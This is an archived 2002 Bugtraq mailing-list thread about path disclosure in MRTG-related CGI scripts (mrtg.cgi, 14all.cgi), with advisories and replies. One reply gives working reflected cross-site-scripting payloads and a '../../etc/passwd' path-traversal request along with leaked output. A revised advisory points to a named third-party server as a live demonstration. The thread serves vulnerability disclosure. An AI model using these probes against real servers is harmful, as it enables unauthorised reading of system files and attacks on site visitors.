7943813 2002-02-04 02:18 +0200 /68 rader/ Tamer Sahin <ts@securityoffice.net> Sänt av: joel@lysator.liu.se Importerad: 2002-02-04 18:04 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Externa svar till: ts@securityoffice.net Mottagare: Bugtraq (import) <20785> Ärende: Mrtg Path Disclosure Vulnerability ------------------------------------------------------------ From: "Tamer Sahin" <ts@securityoffice.net> To: <bugtraq@securityfocus.com> Message-ID: <000e01c1ad11$8849c5f0$d5fb83d9@ts> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Mrtg Path Disclosure Vulnerability Type: Input Validation Error Release Date: February 4, 2002 Product / Vendor: The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the traffic load on network-links. Mrtg generates html pages containing gif images which provide a live visual representation of this traffic. http://www.mrtg.org Summary: If an attacker submits a web request containing unexpected arguments for script variables, an error message will be displayed containing the path to the webroot directory of the server running the Mrtg cgi script. http://host/mrtg.cgi?cfg=blabla Tested: Mrtg v2.090011 Mrtg v2.090006 Vulnerable: Mrtg v2.090011 Mrtg v2.090006 And may be other. Disclaimer: http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author: Tamer Sahin ts@securityoffice.net http://www.securityoffice.net Tamer Sahin http://www.securityoffice.net PGP Key ID: 0x2B5EDCB0 Fingerprint: B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0 -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD Tbl6HDhKVnFPEy1DSB3/q3AH =+kUc -----END PGP SIGNATURE----- (7943813) /Tamer Sahin <ts@securityoffice.net>/----- Kommentar i text 7944923 av Barney Wolff <barney@databus.com> 7945975 2002-02-04 10:56 -0700 /63 rader/ Dave Ahmad <da@securityfocus.com> Sänt av: joel@lysator.liu.se Importerad: 2002-02-04 21:46 av Brevbäraren Extern mottagare: Barney Wolff <barney@databus.com> Extern kopiemottagare: Tamer Sahin <ts@securityoffice.net> Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <20794> Kommentar till text 7944923 av Barney Wolff <barney@databus.com> Ärende: Re: Mrtg Path Disclosure Vulnerability ------------------------------------------------------------ From: Dave Ahmad <da@securityfocus.com> To: Barney Wolff <barney@databus.com> Cc: Tamer Sahin <ts@securityoffice.net>, <bugtraq@securityfocus.com> Message-ID: <Pine.LNX.4.43.0202041050560.18483-100000@mail.securityfocus.com> Barney, You're correct.. 'mrtg.cgi' is not part of MRTG. It's from a completely indepedent utility called 'mrtgconfig'. The project homepage is: http://mrtgconfig.sourceforge.net/ The path disclosure issue (version 0.5.9): [dma@victim mrtgconfig]$ /home/dma/mtrg/mrtgconfig/mrtg.cgi (offline mode: enter name=value pairs on standard input) cfg Content-type: text/html <H1>Software error:</H1> <CODE>Can't open configuration file for mrtgconfig: No such file or directory at /home/dma/mrtg/mrtgconfig/mrtg.cgi line 46, <STDIN> chunk 1. </CODE> <P> For help, please send mail to this site's webmaster, giving this error message and the time and date of the error. Dave Ahmad SecurityFocus www.securityfocus.com On Mon, 4 Feb 2002, Barney Wolff wrote: > Unless I'm terribly confused, mrtg only generates files and runs off > cron, not as a cgi. So you're dealing with something other than mrtg > itself. Also, the current version is 2.9.18pre1. > > Barney Wolff > > On Mon, Feb 04, 2002 at 02:18:54AM +0200, Tamer Sahin wrote: > > > > Summary: > > If an attacker submits a web request containing unexpected arguments > > for script variables, an error message will be displayed containing > > the path to the webroot directory of the server running the Mrtg cgi > > script. > > > > http://host/mrtg.cgi?cfg=blabla > > > > Tested: > > Mrtg v2.090011 > > Mrtg v2.090006 > > > > Vulnerable: > > Mrtg v2.090011 > > Mrtg v2.090006 > > > > And may be other. > (7945975) /Dave Ahmad <da@securityfocus.com>/(Ombruten) 7946902 2002-02-04 21:09 +0100 /92 rader/ Frog Man <leseulfrog@hotmail.com> Sänt av: joel@lysator.liu.se Importerad: 2002-02-04 23:34 av Brevbäraren Extern mottagare: ts@securityoffice.net Extern kopiemottagare: bugtraq@securityfocus.com Mottagare: Bugtraq (import) <20800> Ärende: Re: Mrtg Path Disclosure Vulnerability ------------------------------------------------------------ From: "Frog Man" <leseulfrog@hotmail.com> To: ts@securityoffice.net Cc: bugtraq@securityfocus.com Message-ID: <F92E6l7GWzG7JEKVb5N000165f6@hotmail.com> /mrtg.cgi?log=<script>alert('CSS')</script> /mrtg.cgi?log=<script>alert('Cross Site Scripting')</script> /mrtg.cgi?cfg=../../etc/passwd : ------------------- mrtg.cgi error ------------------------ Software error: ERROR: CFG Error Unknown Option "root:PASS:0:0:root:/root" on line 2 or above. Check doc/reference.txt for Help ------------------- mrtg.cgi error ------------------------ >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >Mrtg Path Disclosure Vulnerability > >Type: >Input Validation Error > >Release Date: >February 4, 2002 > >Product / Vendor: >The Multi Router Traffic Grapher (Mrtg) is a tool to monitor the >traffic load on network-links. Mrtg generates html pages containing >gif images which provide a live visual representation of this >traffic. > >http://www.mrtg.org > >Summary: >If an attacker submits a web request containing unexpected arguments >for script variables, an error message will be displayed containing >the path to the webroot directory of the server running the Mrtg cgi >script. > >http://host/mrtg.cgi?cfg=blabla > >Tested: >Mrtg v2.090011 >Mrtg v2.090006 > >Vulnerable: >Mrtg v2.090011 >Mrtg v2.090006 > >And may be other. > >Disclaimer: >http://www.securityoffice.net is not responsible for the misuse or >illegal use of any of the information and/or the software listed on >this security advisory. > >Author: >Tamer Sahin >ts@securityoffice.net >http://www.securityoffice.net > >Tamer Sahin >http://www.securityoffice.net >PGP Key ID: 0x2B5EDCB0 Fingerprint: >B96A 5DFC E0D9 D615 8D28 7A1B BB8B A453 2B5E DCB0 > >-----BEGIN PGP SIGNATURE----- >Version: PGP 7.1 > >iQA/AwUBPF3TbLuLpFMrXtywEQIU5QCghYmngYvhwveU+8W3JwTz5QtsmU0AoJZD >Tbl6HDhKVnFPEy1DSB3/q3AH >=+kUc >-----END PGP SIGNATURE----- > > > > _________________________________________________________________ Téléchargez MSN Explorer gratuitement à l'adresse http://explorer.msn.fr/intl.asp. (7946902) /Frog Man <leseulfrog@hotmail.com>/(Ombruten) 7953529 2002-02-06 00:30 +0200 /69 rader/ Tamer Sahin <ts@securityoffice.net> Sänt av: joel@lysator.liu.se Importerad: 2002-02-05 23:49 av Brevbäraren Extern mottagare: bugtraq@securityfocus.com Extern kopiemottagare: michael@michaelearls.com Externa svar till: ts@securityoffice.net Mottagare: Bugtraq (import) <20837> Ärende: Mrtg Path Disclosure Vulnerability (Revised) ------------------------------------------------------------ From: "Tamer Sahin" <ts@securityoffice.net> To: <bugtraq@securityfocus.com> Cc: <michael@michaelearls.com> Message-ID: <00ae01c1ae94$b2102580$718f83d9@ts> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 */This is Mrtg Web Frontend 14all.cgi bug. You may find the revised security announcement below/* Mrtg/RRD 14all.cgi Path Disclosure Vulnerability Type: Input Validation Error Release Date: February 4, 2002 Product / Vendor: 14all.cgi is a CGI script to create html pages and graphics for Mrtg. http://people.ee.ethz.ch/~oetiker/webtools/mrtg/mrtg-rrd.html Summary: If an attacker submits a web request containing unexpected arguments for script variables, an error message will be displayed containing the path to the webroot directory of the server running the Mrtg/RRD 14all.cgi script. http://host/mrtg.cgi?cfg=blabla Tested: Mrtg/RRD 14all.cgi v1.1p15 Vulnerable: Mrtg/RRD 14all.cgi v1.1p15 And may be other. Demonstration: http://barnes.bloomu.edu/cgi-bin/mrtg.cgi?cfg=blabla Disclaimer: http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. Author: Tamer Sahin ts@securityoffice.net http://www.securityoffice.net Tamer Sahin http://www.securityoffice.net PGP Key ID: 0x2B5EDCB0 -----BEGIN PGP SIGNATURE----- Version: PGP 7.1 iQA/AwUBPGBc+buLpFMrXtywEQJRLACfQ6sMmsTi4fD3PG3p7AFDxmo3XogAnj58 fnyk5QpMwxQQ7WBFTQ/w+fj+ =rxm+ -----END PGP SIGNATURE----- (7953529) /Tamer Sahin <ts@securityoffice.net>/-----